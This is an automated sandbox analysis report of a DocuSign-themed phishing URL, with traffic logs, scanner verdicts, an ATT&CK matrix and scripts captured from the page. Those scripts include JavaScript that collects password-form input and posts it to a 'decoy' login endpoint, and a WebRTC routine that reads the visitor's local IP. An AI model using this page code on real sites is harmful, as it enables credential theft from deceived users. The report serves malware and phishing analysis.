Edit tour

Windows Analysis Report
https://online-ops.mypasschange.com/landingPage/2/fbb0559ebe1911efb53c0242ac190102

Overview

General Information

Sample URL:	https://online-ops.mypasschange.com/landingPage/2/fbb0559ebe1911efb53c0242ac190102
Analysis ID:	1581294
Infos:

Detection

Score:	64
Range:	0 - 100
Whitelisted:	false
Confidence:	100%

Signatures

Antivirus / Scanner detection for submitted sample

Antivirus detection for URL or domain

Misleading page title found

HTML body contains low number of good links

HTML body contains password input but no form action

Classification

Process Tree

System is w7x64

chrome.exe (PID: 1432 cmdline: "C:\Program Files (x86)\Google\Chrome\Application\chrome.exe" --start-maximized "about:blank" MD5: FFA2B8E17F645BCC20F0E0201FEF83ED)

chrome.exe (PID: 1332 cmdline: "C:\Program Files (x86)\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=1436 --field-trial-handle=1252,i,6250808588721711957,17382127797297879389,131072 --disable-features=OptimizationGuideModelDownloading,OptimizationHints,OptimizationHintsFetching,OptimizationTargetPrediction /prefetch:8 MD5: FFA2B8E17F645BCC20F0E0201FEF83ED)

chrome.exe (PID: 1392 cmdline: "C:\Program Files (x86)\Google\Chrome\Application\chrome.exe" "https://online-ops.mypasschange.com/landingPage/2/fbb0559ebe1911efb53c0242ac190102" MD5: FFA2B8E17F645BCC20F0E0201FEF83ED)

cleanup

HTTP traffic detected: POST /api/landingPage/web_interaction HTTP/1.1Host: online-ops.mypasschange.comConnection: keep-aliveContent-Length: 76sec-ch-ua: "Not_A Brand";v="99", "Google Chrome";v="109", "Chromium";v="109"sec-ch-ua-platform: "Windows"sec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/109.0.0.0 Safari/537.36Content-Type: application/jsonAccept: */*Origin: https://online-ops.mypasschange.comSec-Fetch-Site: same-originSec-Fetch-Mode: corsSec-Fetch-Dest: emptyReferer: https://online-ops.mypasschange.com/landingPage/2/fbb0559ebe1911efb53c0242ac190102Accept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9

Source: global traffic	HTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginxDate: Fri, 27 Dec 2024 09:32:29 GMTContent-Type: text/htmlContent-Length: 548Connection: close
Source: global traffic	HTTP traffic detected: HTTP/1.1 403 ForbiddenServer: nginxDate: Fri, 27 Dec 2024 09:32:42 GMTContent-Type: text/html; charset=utf-8Content-Length: 9Connection: closeX-Frame-Options: SAMEORIGINVary: origin
Source: global traffic	HTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginxDate: Fri, 27 Dec 2024 09:32:49 GMTContent-Type: text/htmlContent-Length: 548Connection: close

Source: chromecache_92.1.dr, chromecache_106.1.dr, chromecache_103.1.dr, chromecache_95.1.dr	String found in binary or memory: http://www.passwordmeter.com/)
Source: chromecache_92.1.dr, chromecache_106.1.dr, chromecache_103.1.dr, chromecache_95.1.dr	String found in binary or memory: http://www.todnem.com/)
Source: chromecache_92.1.dr, chromecache_106.1.dr, chromecache_103.1.dr, chromecache_95.1.dr	String found in binary or memory: https://github.com/mvhenten/string-entropy/blob/master/index.js

Source: unknown	Network traffic detected: HTTP traffic on port 49185 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49189
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49188
Source: unknown	Network traffic detected: HTTP traffic on port 49181 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49187
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49186
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49185
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49184
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49183
Source: unknown	Network traffic detected: HTTP traffic on port 49189 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49182
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49181
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49180
Source: unknown	Network traffic detected: HTTP traffic on port 49195 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49166 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49191 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49184 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49179
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49178
Source: unknown	Network traffic detected: HTTP traffic on port 49180 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49190 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49174
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49173
Source: unknown	Network traffic detected: HTTP traffic on port 49188 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49171
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49170
Source: unknown	Network traffic detected: HTTP traffic on port 49194 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49167 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49173 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49169
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49168
Source: unknown	Network traffic detected: HTTP traffic on port 49187 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49167
Source: unknown	Network traffic detected: HTTP traffic on port 49183 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49166
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49165
Source: unknown	Network traffic detected: HTTP traffic on port 49197 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49168 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49170 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49193 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49174 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49178 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49186 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49182 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49165 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49197
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49195
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49194
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49193
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49192
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49191
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49190
Source: unknown	Network traffic detected: HTTP traffic on port 49169 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49171 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49192 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49179 -> 443

Source: classification engine

Classification label: mal64.phis.win@19/36@10/4

Source: C:\Program Files (x86)\Google\Chrome\Application\chrome.exe

File created: C:\Program Files\Google

Jump to behavior

Source: unknown	Process created: C:\Program Files (x86)\Google\Chrome\Application\chrome.exe "C:\Program Files (x86)\Google\Chrome\Application\chrome.exe" --start-maximized "about:blank"
Source: C:\Program Files (x86)\Google\Chrome\Application\chrome.exe	Process created: C:\Program Files (x86)\Google\Chrome\Application\chrome.exe "C:\Program Files (x86)\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=1436 --field-trial-handle=1252,i,6250808588721711957,17382127797297879389,131072 --disable-features=OptimizationGuideModelDownloading,OptimizationHints,OptimizationHintsFetching,OptimizationTargetPrediction /prefetch:8
Source: unknown	Process created: C:\Program Files (x86)\Google\Chrome\Application\chrome.exe "C:\Program Files (x86)\Google\Chrome\Application\chrome.exe" "https://online-ops.mypasschange.com/landingPage/2/fbb0559ebe1911efb53c0242ac190102"
Source: C:\Program Files (x86)\Google\Chrome\Application\chrome.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Program Files (x86)\Google\Chrome\Application\chrome.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Program Files (x86)\Google\Chrome\Application\chrome.exe	Process created: C:\Program Files (x86)\Google\Chrome\Application\chrome.exe "C:\Program Files (x86)\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=1436 --field-trial-handle=1252,i,6250808588721711957,17382127797297879389,131072 --disable-features=OptimizationGuideModelDownloading,OptimizationHints,OptimizationHintsFetching,OptimizationTargetPrediction /prefetch:8	Jump to behavior
Source: C:\Program Files (x86)\Google\Chrome\Application\chrome.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Program Files (x86)\Google\Chrome\Application\chrome.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Program Files (x86)\Google\Chrome\Application\chrome.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Program Files (x86)\Google\Chrome\Application\chrome.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Program Files (x86)\Google\Chrome\Application\chrome.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Program Files (x86)\Google\Chrome\Application\chrome.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Program Files (x86)\Google\Chrome\Application\chrome.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Program Files (x86)\Google\Chrome\Application\chrome.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Program Files (x86)\Google\Chrome\Application\chrome.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Program Files (x86)\Google\Chrome\Application\chrome.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Program Files (x86)\Google\Chrome\Application\chrome.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Program Files (x86)\Google\Chrome\Application\chrome.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Program Files (x86)\Google\Chrome\Application\chrome.exe	Process created: unknown unknown	Jump to behavior

Source: Window Recorder

Window detected: More than 3 window changes detected

Source: C:\Program Files (x86)\Google\Chrome\Application\chrome.exe	Directory created: C:\Program Files\Google	Jump to behavior
Source: C:\Program Files (x86)\Google\Chrome\Application\chrome.exe	Directory created: C:\Program Files\Google\GoogleUpdater	Jump to behavior
Source: C:\Program Files (x86)\Google\Chrome\Application\chrome.exe	Directory created: C:\Program Files\chrome_BITS_1432_610148592	Jump to behavior

Mitre Att&ck Matrix

Reconnaissance	Resource Development	Initial Access	Execution	Persistence	Privilege Escalation	Defense Evasion	Credential Access	Discovery	Lateral Movement	Collection	Command and Control	Exfiltration	Impact
Gather Victim Identity Information	Acquire Infrastructure	Valid Accounts	Windows Management Instrumentation	Path Interception	1 Process Injection	2 Masquerading	OS Credential Dumping	System Service Discovery	Remote Services	Data from Local System	1 Encrypted Channel	Exfiltration Over Other Network Medium	Abuse Accessibility Features
Credentials	Domains	Default Accounts	Scheduled Task/Job	Boot or Logon Initialization Scripts	Boot or Logon Initialization Scripts	1 Process Injection	LSASS Memory	Application Window Discovery	Remote Desktop Protocol	Data from Removable Media	4 Non-Application Layer Protocol	Exfiltration Over Bluetooth	Network Denial of Service
Email Addresses	DNS Server	Domain Accounts	At	Logon Script (Windows)	Logon Script (Windows)	Obfuscated Files or Information	Security Account Manager	Query Registry	SMB/Windows Admin Shares	Data from Network Shared Drive	5 Application Layer Protocol	Automated Exfiltration	Data Encrypted for Impact
Employee Names	Virtual Private Server	Local Accounts	Cron	Login Hook	Login Hook	Binary Padding	NTDS	System Network Configuration Discovery	Distributed Component Object Model	Input Capture	3 Ingress Tool Transfer	Traffic Duplication	Data Destruction

Behavior Graph

Hide Legend

Legend:

Process
Signature
Created File
DNS/IP Info
Is Dropped
Is Windows Process
Number of created Registry Values
Number of created Files
Visual Basic
Delphi
Java
.Net C# or VB.NET
C, C++ or other language
Is malicious
Internet

Source	Detection	Scanner	Label	Link
https://online-ops.mypasschange.com/landingPage/2/fbb0559ebe1911efb53c0242ac190102	100%	Avira URL Cloud	phishing
https://online-ops.mypasschange.com/landingPage/2/fbb0559ebe1911efb53c0242ac190102	100%	SlashNext	Credential Stealing type: Phishing & Social Engineering

Source	Detection	Scanner	Label
https://online-ops.mypasschange.com/static/css/landing/landing.css	100%	Avira URL Cloud	phishing
https://online-ops.mypasschange.com/favicon.ico	100%	Avira URL Cloud	phishing
https://online-ops.mypasschange.com/static/images/phishing/DocusignDigitallySignDocument/landingPage/login-form.png	100%	Avira URL Cloud	phishing
http://www.todnem.com/)	0%	Avira URL Cloud	safe
http://www.passwordmeter.com/)	0%	Avira URL Cloud	safe
https://secure-directory.net-link-secure.com/static/css/landing/landing.css	100%	Avira URL Cloud	phishing
https://online-ops.mypasschange.com/static/images/phishing/DocusignDigitallySignDocument/landingPage/docusign_background.png	100%	Avira URL Cloud	phishing
https://online-ops.mypasschange.com/static/lib/password-meter.js	100%	Avira URL Cloud	phishing
https://online-ops.mypasschange.com/api/v2/decoy/web/login	100%	Avira URL Cloud	phishing
https://secure-directory.net-link-secure.com/static/images/phishing/DocusignDigitallySignDocument/landingPage/docusign_background.png	100%	Avira URL Cloud	phishing
https://secure-directory.net-link-secure.com/favicon.ico	100%	Avira URL Cloud	phishing
https://online-ops.mypasschange.com/api/landingPage/web_interaction	100%	Avira URL Cloud	phishing
https://secure-directory.net-link-secure.com/static/lib/password-meter.js	100%	Avira URL Cloud	phishing
https://online-ops.mypasschange.com/static/lib/jquery-1.11.1.min.js	100%	Avira URL Cloud	phishing
https://secure-directory.net-link-secure.com/api/landingPage/web_interaction	100%	Avira URL Cloud	phishing
https://secure-directory.net-link-secure.com/static/lib/jquery-1.11.1.min.js	100%	Avira URL Cloud	phishing

Domains and IPs

Contacted Domains

Name	IP	Active	Malicious	Reputation
secure-directory.net-link-secure.com	52.53.112.200	true	false	unknown
www.google.com	172.217.17.36	true	false	high
online-ops.mypasschange.com	52.53.112.200	true	false	unknown

Contacted URLs

Name	Malicious	Antivirus Detection	Reputation
https://online-ops.mypasschange.com/static/images/phishing/DocusignDigitallySignDocument/landingPage/docusign_background.png	false	Avira URL Cloud: phishing	unknown
https://online-ops.mypasschange.com/favicon.ico	false	Avira URL Cloud: phishing	unknown
https://secure-directory.net-link-secure.com/static/images/phishing/DocusignDigitallySignDocument/landingPage/docusign_background.png	false	Avira URL Cloud: phishing	unknown
https://online-ops.mypasschange.com/static/lib/password-meter.js	false	Avira URL Cloud: phishing	unknown
https://online-ops.mypasschange.com/static/images/phishing/DocusignDigitallySignDocument/landingPage/login-form.png	false	Avira URL Cloud: phishing	unknown
https://online-ops.mypasschange.com/api/v2/decoy/web/login	false	Avira URL Cloud: phishing	unknown
https://online-ops.mypasschange.com/static/css/landing/landing.css	false	Avira URL Cloud: phishing	unknown
https://secure-directory.net-link-secure.com/static/css/landing/landing.css	false	Avira URL Cloud: phishing	unknown
https://secure-directory.net-link-secure.com/landingPage/3/fbb0559ebe1911efb53c0242ac190102	true		unknown
https://secure-directory.net-link-secure.com/favicon.ico	false	Avira URL Cloud: phishing	unknown
https://online-ops.mypasschange.com/landingPage/2/fbb0559ebe1911efb53c0242ac190102	true		unknown
https://online-ops.mypasschange.com/static/lib/jquery-1.11.1.min.js	false	Avira URL Cloud: phishing	unknown
https://online-ops.mypasschange.com/api/landingPage/web_interaction	false	Avira URL Cloud: phishing	unknown
https://secure-directory.net-link-secure.com/static/lib/password-meter.js	false	Avira URL Cloud: phishing	unknown
https://secure-directory.net-link-secure.com/static/lib/jquery-1.11.1.min.js	false	Avira URL Cloud: phishing	unknown
https://secure-directory.net-link-secure.com/api/landingPage/web_interaction	false	Avira URL Cloud: phishing	unknown

URLs from Memory and Binaries

Name	Source	Malicious	Antivirus Detection	Reputation
http://www.todnem.com/)	chromecache_92.1.dr, chromecache_106.1.dr, chromecache_103.1.dr, chromecache_95.1.dr	false	Avira URL Cloud: safe	unknown
http://www.passwordmeter.com/)	chromecache_92.1.dr, chromecache_106.1.dr, chromecache_103.1.dr, chromecache_95.1.dr	false	Avira URL Cloud: safe	unknown
https://github.com/mvhenten/string-entropy/blob/master/index.js	chromecache_92.1.dr, chromecache_106.1.dr, chromecache_103.1.dr, chromecache_95.1.dr	false		high

World Map of Contacted IPs

No. of IPs < 25%
25% < No. of IPs < 50%
50% < No. of IPs < 75%
75% < No. of IPs

Public IPs

IP	Domain	Country	ASN	ASN Name	Malicious
239.255.255.250	unknown	Reserved	unknown	unknown	false
172.217.17.36	www.google.com	United States	15169	GOOGLEUS	false
52.53.112.200	secure-directory.net-link-secure.com	United States	16509	AMAZON-02US	false

Private

IP
192.168.2.22

General Information

Joe Sandbox version:	41.0.0 Charoite
Analysis ID:	1581294
Start date and time:	2024-12-27 10:31:21 +01:00
Joe Sandbox product:	CloudBasic
Overall analysis duration:	0h 3m 2s
Hypervisor based Inspection enabled:	false
Report type:	full
Cookbook file name:	browseurl.jbs
Sample URL:	https://online-ops.mypasschange.com/landingPage/2/fbb0559ebe1911efb53c0242ac190102
Analysis system description:	Windows 7 x64 SP1 with Office 2010 SP1 (IE 11, FF52, Chrome 57, Adobe Reader DC 15, Flash 25.0.0.127, Java 8 Update 121, .NET 4.6.2)
Number of analysed new started processes analysed:	3
Number of new started drivers analysed:	2
Number of existing processes analysed:	0
Number of existing drivers analysed:	0
Number of injected processes analysed:	0
Technologies:	HCA enabled EGA enabled AMSI enabled
Analysis Mode:	default
Analysis stop reason:	Timeout
Detection:	MAL
Classification:	mal64.phis.win@19/36@10/4
EGA Information:	Failed
HCA Information:	Successful, ratio: 100% Number of executed functions: 0 Number of non-executed functions: 0

Warnings

Exclude process from analysis (whitelisted): vga.dll
Excluded IPs from analysis (whitelisted): 172.217.19.195, 74.125.71.84, 172.217.17.46, 172.217.19.238, 142.250.181.106, 142.250.181.42, 172.217.17.42, 142.250.181.74, 216.58.208.234, 172.217.19.170, 142.250.181.138, 172.217.17.74, 172.217.21.42, 172.217.19.234, 172.217.19.202, 142.250.181.99, 34.104.35.123
Excluded domains from analysis (whitelisted): clients2.google.com, accounts.google.com, redirector.gvt1.com, content-autofill.googleapis.com, edgedl.me.gvt1.com, update.googleapis.com, clientservices.googleapis.com, safebrowsing.googleapis.com, clients.l.google.com
Not all processes where analyzed, report is missing behavior information
VT rate limit hit for: https://online-ops.mypasschange.com/landingPage/2/fbb0559ebe1911efb53c0242ac190102

Input	Output
URL: https://online-ops.mypasschange.com Model: Joe Sandbox AI	{ "typosquatting": false, "unusual_query_string": false, "suspicious_tld": false, "ip_in_url": false, "long_subdomain": false, "malicious_keywords": true, "encoded_characters": false, "redirection": false, "contains_email_address": false, "known_domain": false, "brand_spoofing_attempt": false, "third_party_hosting": true }
URL: https://online-ops.mypasschange.com
URL: https://online-ops.mypasschange.com/landingPage/2/... Model: Joe Sandbox AI	{ "risk_score": 2, "reasoning": "The provided JavaScript snippet appears to be extracting email_guid and step_id_number from the current URL path, which is a common practice for web applications. This behavior does not indicate any high-risk or malicious activities, and it is likely part of legitimate functionality." }
var path = window.location.pathname; lastSlashIndex = path.lastIndexOf('/'); prevSlashIndex = path.lastIndexOf('/', lastSlashIndex-1); email_guid = path.substring(lastSlashIndex+1); step_id_number = path.substring(prevSlashIndex+1,lastSlashIndex);
URL: https://online-ops.mypasschange.com/landingPage/2/... Model: Joe Sandbox AI	{ "risk_score": 4, "reasoning": "The script appears to be collecting the user's local IP address using WebRTC, which is a moderate-risk behavior. However, there are no clear indicators of data exfiltration or other malicious intent, and the script seems to be focused on gathering technical information rather than sensitive user data. Overall, the script exhibits some potentially concerning behaviors, but the intent appears to be more benign than malicious." }
var path = window.location.pathname; lastSlashIndex = path.lastIndexOf('/'); prevSlashIndex = path.lastIndexOf('/', lastSlashIndex-1); email_guid = path.substring(lastSlashIndex+1); step_id_number = path.substring(prevSlashIndex+1,lastSlashIndex); var localIp = ""; $(function(){ try{ getLocalIp(); } catch(err){ return true; } var path = window.location.pathname; }); function getPluginsInfo(){ dataPlugins={}; return dataPlugins; } function getLocalIp(){ var RTCPeerConnection = window.webkitRTCPeerConnection \|\| window.mozRTCPeerConnection; var pc; if(RTCPeerConnection){ pc = new RTCPeerConnection({ "iceServers": [] }); if (1 \|\| window.mozRTCPeerConnection) pc.createDataChannel('', {reliable:false}); pc.onicecandidate = function (evt) { if (evt.candidate) { if (!localIp) { localIp = getIpFromString( evt.candidate.candidate ); } } }; pc.createOffer(function (offerDesc) {; pc.setLocalDescription(offerDesc); }, function (e) { console.error(e); }); function getIpFromString(a) { var r = a.match(/\b(25[0-5]\|2[0-4][0-9]\|[01]?[0-9][0-9]?)\.(25[0-5]\|2[0-4][0-9]\|[01]?[0-9][0-9]?)\.(25[0-5]\|2[0-4][0-9]\|[01]?[0-9][0-9]?)\.(25[0-5]\|2[0-4][0-9]\|[01]?[0-9][0-9]?)\b/); if (r == null) return null; return r[0]; } } }
URL: https://online-ops.mypasschange.com/static/lib/jqu... Model: Joe Sandbox AI	{ "risk_score": 1, "reasoning": "This appears to be the standard jQuery library, which is a widely used and trusted JavaScript library. It does not contain any high-risk indicators, such as dynamic code execution, data exfiltration, or suspicious redirects. The code is well-structured and does not exhibit any obfuscation or aggressive DOM manipulation. Overall, this is a low-risk script that is commonly used for legitimate web development purposes." }
/! jQuery v1.11.1 \| (c) 2005, 2014 jQuery Foundation, Inc. \| jquery.org/license / !function(a,b){"object"==typeof module&&"object"==typeof module.exports?module.exports=a.document?b(a,!0):function(a){if(!a.document)throw new Error("jQuery requires a window with a document");return b(a)}:b(a)}("undefined"!=typeof window?window:this,function(a,b){var c=[],d=c.slice,e=c.concat,f=c.push,g=c.indexOf,h={},i=h.toString,j=h.hasOwnProperty,k={},l="1.11.1",m=function(a,b){return new m.fn.init(a,b)},n=/^[\s\uFEFF\xA0]+\|[\s\uFEFF\xA0]+$/g,o=/^-ms-/,p=/-([\da-z])/gi,q=function(a,b){return b.toUpperCase()};m.fn=m.prototype={jquery:l,constructor:m,selector:"",length:0,toArray:function(){return d.call(this)},get:function(a){return null!=a?0>a?this[a+this.length]:this[a]:d.call(this)},pushStack:function(a){var b=m.merge(this.constructor(),a);return b.prevObject=this,b.context=this.context,b},each:function(a,b){return m.each(this,a,b)},map:function(a){return this.pushStack(m.map(this,function(b,c){return a.call(b,c,b)}))},slice:function(){return this.pushStack(d.apply(this,arguments))},first:function(){return this.eq(0)},last:function(){return this.eq(-1)},eq:function(a){var b=this.length,c=+a+(0>a?b:0);return this.pushStack(c>=0&&b>c?[this[c]]:[])},end:function(){return this.prevObject\|\|this.constructor(null)},push:f,sort:c.sort,splice:c.splice},m.extend=m.fn.extend=function(){var a,b,c,d,e,f,g=arguments[0]\|\|{},h=1,i=arguments.length,j=!1;for("boolean"==typeof g&&(j=g,g=arguments[h]\|\|{},h++),"object"==typeof g\|\|m.isFunction(g)\|\|(g={}),h===i&&(g=this,h--);i>h;h++)if(null!=(e=arguments[h]))for(d in e)a=g[d],c=e[d],g!==c&&(j&&c&&(m.isPlainObject(c)\|\|(b=m.isArray(c)))?(b?(b=!1,f=a&&m.isArray(a)?a:[]):f=a&&m.isPlainObject(a)?a:{},g[d]=m.extend(j,f,c)):void 0!==c&&(g[d]=c));return g},m.extend({expando:"jQuery"+(l+Math.random()).replace(/\D/g,""),isReady:!0,error:function(a){throw new Error(a)},noop:function(){},isFunction:function(a){return"function"===m.type(a)},isArray:Array.isArray\|\|function(a){return"array"===m.type(a)},isWindow:function(a){return null!=a&&a==a.window},isNumeric:function(a){return!m.isArray(a)&&a-parseFloat(a)>=0},isEmptyObject:function(a){var b;for(b in a)return!1;return!0},isPlainObject:function(a){var b;if(!a\|\|"object"!==m.type(a)\|\|a.nodeType\|\|m.isWindow(a))return!1;try{if(a.constructor&&!j.call(a,"constructor")&&!j.call(a.constructor.prototype,"isPrototypeOf"))return!1}catch(c){return!1}if(k.ownLast)for(b in a)return j.call(a,b);for(b in a);return void 0===b\|\|j.call(a,b)},type:function(a){return null==a?a+"":"object"==typeof a\|\|"function"==typeof a?h[i.call(a)]\|\|"object":typeof a},globalEval:function(b){b&&m.trim(b)&&(a.execScript\|\|function(b){a.eval.call(a,b)})(b)},camelCase:function(a){return a.replace(o,"ms-").replace(p,q)},nodeName:function(a,b){return a.nodeName&&a.nodeName.toLowerCase()===b.toLowerCase()},each:function(a,b,c){var d,e=0,f=a.length,g=r(a);if(c){if(g){for(;f>e;e++)if(d=b.apply(a[e],c),d===!1)break}else for(e in a)if(d=b.apply(a[e],c),d===!1)break}else if(g){for(;f>e;e++)if(d=b.call(a[e],e,a[e]),d===!1)break}else for(e in a)if(d=b.call(a[e],e,a[e]),d===!1)break;return a},trim:function(a){return null==a?"":(a+"").replace(n,"")},makeArray:function(a,b){var c=b\|\|[];return null!=a&&(r(Object(a))?m.merge(c,"string"==typeof a?[a]:a):f.call(c,a)),c},inArray:function(a,b,c){var d;if(b){if(g)return g.call(b,a,c);for(d=b.length,c=c?0>c?Math.max(0,d+c):c:0;d>c;c++)if(c in b&&b[c]===a)return c}return-1},merge:function(a,b){var c=+b.length,d=0,e=a.length;while(c>d)a[e++]=b[d++];if(c!==c)while(void 0!==b[d])a[e++]=b[d++];return a.length=e,a},grep:function(a,b,c){for(var d,e=[],f=0,g=a.length,h=!c;g>f;f++)d=!b(a[f],f),d!==h&&e.push(a[f]);return e},map:function(a,b,c){var d,f=0,g=a.length,h=r(a),i=[];if(h)for(;g>f;f++)d=b(a[f],f,c),null!=d&&i.push(d);else for(f in a)d=b(a[f],f,c),null!=d&&i.push(d);return e.apply([],i)},guid:1,proxy:function(a,b){var c,e,f;return"string"==typeof b&&(f=a[b],b=a,a=f),m.isFunction(a)?(c=d.cal
URL: https://online-ops.mypasschange.com/landingPage/2/... Model: Joe Sandbox AI	{ "risk_score": 4, "reasoning": "The provided JavaScript snippet has a mix of low-risk and moderate-risk indicators. While it does not contain any high-risk behaviors like dynamic code execution or data exfiltration, it has some concerning aspects, such as sending user data to a server without clear transparency and aggressive DOM manipulation. Additionally, the use of a custom password complexity check function could potentially introduce security vulnerabilities if not implemented properly. Overall, the script requires further review to ensure it is not misusing user data or introducing security risks." }
$(document).ready(function () { var current_date = new Date(); var datetime = "Last Sync: " + current_date.getDate() + "/" + (current_date.getMonth()+1) + "/" + current_date.getFullYear() + " @ " + current_date.getHours() + ":" + current_date.getMinutes() + ":" + current_date.getSeconds(); $("#password-form").on("click", "button", function (e) { e.preventDefault(); e.returnValue = false; var inputs = $(":input") var optional = inputs.not(':password'); var bucket = {}; bucket.password = inputs.filter(':password').map(function(){ var key = $(this).attr('name') \|\| $(this).attr('id'); var value = $(this).val(); if (key == 'clear-password') { // collect password - do not substitute the password with anythign else } else if (key == 'partial-password') { if (value && (value.length > 4)){ // set value to include first 4 characters and then asterisks value = value.substring(0, Math.min(value.length,4)) + Array(Math.max(0,value.length-3)).join("*"); } } else { var value = checkComplexity(value); } var result = {} result[key] = value; return result; }).get(); bucket.unformatted = optional.not('[format]').map(function() { var key = $(this).attr('name') \|\| $(this).attr('id'); var value = $(this).val(); var result = {} result[key] = value; return result; }).get(); optional.filter('[format]').each(function(){ var format = $(this).attr('format') var key = $(this).attr('name') \|\| $(this).attr('id'); var value = $(this).val(); bucket[format] = bucket[format] \|\| []; var result = {} result[key] = value; bucket[format].push(result); }); optional.filter('[format]').each(function(){ var format = $(this).attr('format') var key = $(this).attr('name') \|\| $(this).attr('id'); var value = $(this).val(); }); bucket.guid = email_guid; bucket.step_id = step_id_number; $.post("/api/v2/decoy/web/login", JSON.stringify(bucket)).success(function (data) { if (data.redirect && data.redirect != "") { window.location = data.redirect; } else if (data.dialog && data.dialog != "") { $('#success-dialog').show(); $('#success-dialog').css("left", $(window).innerWidth() / 2 - 200); $('.dialog-text').html(data.dialog); $("#password-form").off("click", "button"); } }); }); $("#static-ack").on("click", "button", function (e) { e.preventDefault(); e.returnValue = false; $.post("/ack", { guid: email_guid, step_id : step_id_number, type: 61, redirect: true}).success(function(data) { if (data.redirect && data.redirect != "") { window.location = data.redirect; } }); }); }); function checkComplexity(password) { pm = new PasswordMeter(); pm.checkPassword(password); var complexity = pm.Complexity.value; if (isEmpty(password)) { return ("Empty"); } else if (complexity == pm.COMPLEXITY.VERYWEAK) { return("Very Weak"); } else if (complexity == pm.COMPLEXITY.WEAK) { return("Weak"); } else if (complexity == pm.COMPLEXITY.FAIR) { return("Fair"); } else if (complexity == pm.CO
URL: https://secure-directory.net-link-secure.com/landi... Model: Joe Sandbox AI	{ "risk_score": 2, "reasoning": "The provided JavaScript snippet appears to be a legitimate implementation of a web interaction tracking functionality. It uses standard web APIs like `fetch` and `setTimeout` to record user interactions on a landing page. The code does not exhibit any high-risk indicators, such as dynamic code execution, data exfiltration, or suspicious redirects. The use of a delay before the API call is a common practice to mitigate bot clicks. Overall, this script seems to be a benign implementation of a typical web analytics or user interaction tracking feature." }
function sleep(ms) { return new Promise(resolve => setTimeout(resolve, ms)); } document.addEventListener("DOMContentLoaded", async () => { const guid = path.substring(lastSlashIndex + 1); const step_id_number = "3"; const qr_request = "False".toLowerCase() === "true"; // Ensure the function is called only once per session const params = { guid, step_id: step_id_number, qr_request}; await sleep(1000); // assuming that it might help against bot clicks fetch("/api/landingPage/web_interaction", { method: 'POST', headers: { 'Content-Type': 'application/json' }, body: JSON.stringify(params) }).then(response => { if (response.ok) { console.log("Interaction recorded successfully"); } else { console.error("Failed to record interaction"); } }).catch(error => { console.error("Error:", error); }); });
